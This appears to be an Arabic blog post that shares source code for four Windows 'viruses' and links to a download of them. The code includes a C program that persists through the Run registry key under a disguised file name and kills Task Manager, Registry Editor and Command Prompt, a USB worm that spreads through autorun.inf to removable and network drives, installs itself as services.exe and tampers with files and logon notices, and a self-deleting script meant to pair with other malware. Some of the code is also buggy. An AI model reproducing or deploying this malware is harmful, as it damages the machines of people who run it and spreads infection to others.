بطلب من أحد الأصدقاء، أقدم لكم أكواد (codes) لبعض الفيروسات.
ملاحظة: أنا لست الكاتب :/
حسنا، لنبدأ بـ annoying crippling virus و هو فيروس مزعج حقا xD
:::> سيقوم هذا الفيروس باصدار نغمات مزعجة، كما أنه سيبطل برنامج Regedit، Command Prompt (CMD)
و Taskmanager أو Gestionnaire des taches بالفرنسية.
يمكنك الاضافة أو التغيير فيه ^^
-------------------------------------------------------
#include "stdafx.h"
#include "windows.h"
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
HKEY hKey;
char sd[255];
char path[MAX_PATH];
int Freq = 0;
int Duration = 100;
bool Forwards = true;
bool Backwards = false;
int timer = 0;
HWND hWin;
HMODULE GetModH = GetModuleHandle(0);
GetModuleFileName(GetModH, path, 256);
strcat(sd,"\\Blue Corral.bmp.exe");
CopyFile(path,sd,FALSE);
unsigned char PathToFile[20] = "Blue Corral.bmp.exe";
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, SecurityManager",0,REG_SZ,PathToFile,sizeof(PathToFile));
RegCloseKey(hKey);
while(1==1)
{
hWin = FindWindow(NULL,"Windows Task Manager");
SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
hWin = FindWindow(NULL,"Registry Editor");
SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
hWin = FindWindow(NULL,"Command Prompt");
SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
hWin = FindWindow(NULL,"Close Program");
SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
if(Backwards==true)
{
Beep(Freq,Duration);
Freq = Freq - 100;
timer = timer - 1;
}
if (timer == 0)
{
Backwards = false;
Forwards = true;
}
if (timer == 30)
{
Backwards = true;
Forwards = false;
}
if(Forwards==true)
{
Beep(Freq,Duration);
Freq = Freq + 100;
timer = timer + 1;
}
}
return 0;
}
-------------------------------------------------------
الفيروس الثاني : و هو فيروس < موش نورمال :D > USB virus source [worm]
هذا الفيروس ليس للنسخ و اللصق (copy & past use) بل هو للغرض التعليمي فقط لأنه حقا قوي جدّا و سيسبب لك متاعب كثيرة :/
لذلك اذا كنت مبتدئا، فلن تستطيع استخدامه، و هذا لمصلحتك، صدّقني ^^
-------------------------------------------------------
#include <windows.h>
#include <stdio.h>
#define IMSG "|__[__]__/=+-\\ SaveItForLater :] USB Worm /-+=\\__[__]__|"
char me[1024];
HKEY hKey;
char *drives[] = {"C:","D:","E","F:","G:","H:","I:","J:","K:","L:",
"M:","N:","O:","P:","Q:","R:","S:","T:","U:","V:",
"W:","X:","Y:","Z:"};
DWORD WINAPI spreadUSB()
{
while(1)
{
Sleep(120000);
int i;
for(i = 0;i < 24;i++)
{
if((GetDriveType(drives[i])) == DRIVE_REMOVABLE)
{
char hldPath[50];
char usbFile[30] = "\\Driver_Update.exe";
char autoRun[50] = "[autorun]\r\nopen=Driver_Update.exe";
strcpy(hldPath,drives[i]);
strcat(hldPath,"\\autorun.inf");
FILE *fp = fopen("autorun.inf","w");
fprintf(fp,autoRun);
fclose(fp);
CopyFile("autorun.inf",hldPath,0);
remove("autorun.inf");
strcat(drives[i],usbFile);
CopyFile(me,drives[i],0);
}
else if((GetDriveType(drives[i])) == DRIVE_CDROM)
{
char cdPath[50];
char cdFile[20] = "\\Worm_Pwn.exe";
char cdAutr[50] = "[autorun]\r\nopen=Worm_Pwn.exe";
strcpy(cdPath,drives[i]);
strcat(cdPath,"\\autorun.inf");
FILE *fpp = fopen("autorun.inf","w");
fprintf(fpp,cdAutr);
fclose(fpp);
CopyFile("autorun.inf",cdPath,1);
remove("autorun.inf");
strcat(drives[i],cdFile);
CopyFile(me,drives[i],0);
}
else if((GetDriveType(drives[i])) == DRIVE_REMOTE)
{
char remName[20] = "\\Upd_Config.exe";
strcat(drives[i],remName);
CopyFile(me,drives[i],0);
}
}
}
}
BOOL Startup()
{
char dropTo[1024];
GetWindowsDirectory(dropTo,1024);
strcat(dropTo,"\\services.exe");
if((CopyFile(me,dropTo,1)) == 0)
return 0;
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey) == ERROR_SUCCESS)
{
RegSetValueEx(hKey,"services",0,REG_SZ,(const unsigned char*)dropTo,strlen(dropTo));
RegCloseKey(hKey);
}
return 1;
}
}
DWORD WINAPI changeTitle(LPVOID lParam)
{
while(1)
{
HWND hWnd = GetForegroundWindow();
SetWindowText(hWnd,"|__[__]__/=+-\\ SaveItForLater :] Worm - illuz1oN /-+=\\__[__]__|");
}
}
void winLogin(void)
{
HKEY hKey;
char szCaption[] = " |__[__]__/=+-\\ illuz1oN /-+=\\__[__]__|";
char szText[] = " |__[__]__/=+-\\ SaveItForLater :] Worm By illuz1oN /-+=\\__[__]__|"
"\nIf you want to remove this worm, contact illuz1oN - "
"\n... AV Companies ~censored~ You ...";
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",0,KEY_SET_VALUE,&hKey);
RegSetValueEx(hKey,"LegalNoticeCaption",0,REG_SZ,(const unsigned char*)szCaption,sizeof(szCaption));
RegCloseKey(hKey);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",0,KEY_SET_VALUE,&hKey);
RegSetValueEx(hKey,"LegalNoticeText",0,REG_SZ,(const unsigned char*)szText,sizeof(szText));
RegCloseKey(hKey);
}
int WINAPI WinMain (HINSTANCE hinst,HINSTANCE prhin,LPSTR argsx,int in)
{
GetModuleFileName(0,me,1024);
CreateMutex(0,0,"-+- illuz1oN -+-");
if(GetLastError() == ERROR_ALREADY_EXISTS)
{
ExitProcess(0);
}
else
{
if((Startup()) == 0)
{
char szMask[4] = "*.*";
DWORD ret = 0;
WIN32_FIND_DATA fData;
HANDLE hFind,hFile;
hFind = FindFirstFile(szMask,&fData);
if(fData.cFileName == "*.txt")
{
hFile = CreateFile(fData.cFileName,GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if(hFile == INVALID_HANDLE_VALUE)
ExitProcess(0);
else
{
WriteFile(hFile,IMSG,sizeof(IMSG),&ret,0);
CloseHandle(hFile);
}
}
else if(fData.cFileName == "*.exe")
{
SetFileAttributes(fData.cFileName,FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
CloseHandle(hFile);
}
while (FindNextFile(hFind,&fData))
{
if(fData.cFileName == "*.txt")
{
hFile = CreateFile(fData.cFileName,GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if(hFile == INVALID_HANDLE_VALUE)
ExitProcess(0);
else
{
WriteFile(hFile,IMSG,sizeof(IMSG),&ret,0);
CloseHandle(hFile);
}
}
else if(fData.cFileName == "*.exe")
{
SetFileAttributes(fData.cFileName,FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
CloseHandle(hFile);
}
}
FindClose(hFind);
}
else
{
winLogin();
unsigned long title;
CreateThread(0,0,changeTitle,0,0,&title);
unsigned long virii;
CreateThread(0,0,spreadUSB,0,0,&virii);
Sleep(INFINITE);
}
}
}
-------------------------------------------------------
-------------------------------------------------------
#include <iostream>
#include <windows.h>
#define BUF 1000
int main()
{
char windowName[BUF+1];
std::cout << "Window to hide: ";
std::cin.getline(windowName,BUF);
HWND app = FindWindow(NULL, windowName);
if(app)
ShowWindow(app, SW_HIDE);
return 0;
}
-------------------------------------------------------
أما الفيروس الرابع و الأخير : Self Destruct
يقوم هذا الفيروس بتدمير نفسه... طبعا يمكنك الاستفادة منه اذا ما وضعته مع فيروس آخر ^^
-------------------------------------------------------
Set objShell=WScript.CreateObject("WScript.Shell")
f=Wscript.ScriptName
Set objShell=WScript.CreateObject("WScript.Shell")
a=Minute(Now())+1
objShell.Run"at "&Hour(Now())&":"&a&" del /f "&n,0,false
Dim oFilesys,oFiletxt, sFilename, sPath
Set oFilesys=CreateObject("Scripting.FileSystemObject")
Set oFiletxt=oFilesys.CreateTextFile(f,true)
oFiletxt.WriteLine("")
oFiletxt.Close'
Function UserInput(myPrompt)
If UCase( Right(WScript.FullName,12))="\CSCRIPT.EXE"Then
WScript.StdOut.Write myPrompt & " "
UserInput=WScript.StdIn.ReadLine
Else
UserInput=InputBox(myPrompt)
End If
End Function
-------------------------------------------------------
يمكنك تحميل هذه الفروسات source codes من هنا : http://www.fileserve.com/file/kfJDm8X
0 comments:
Post a Comment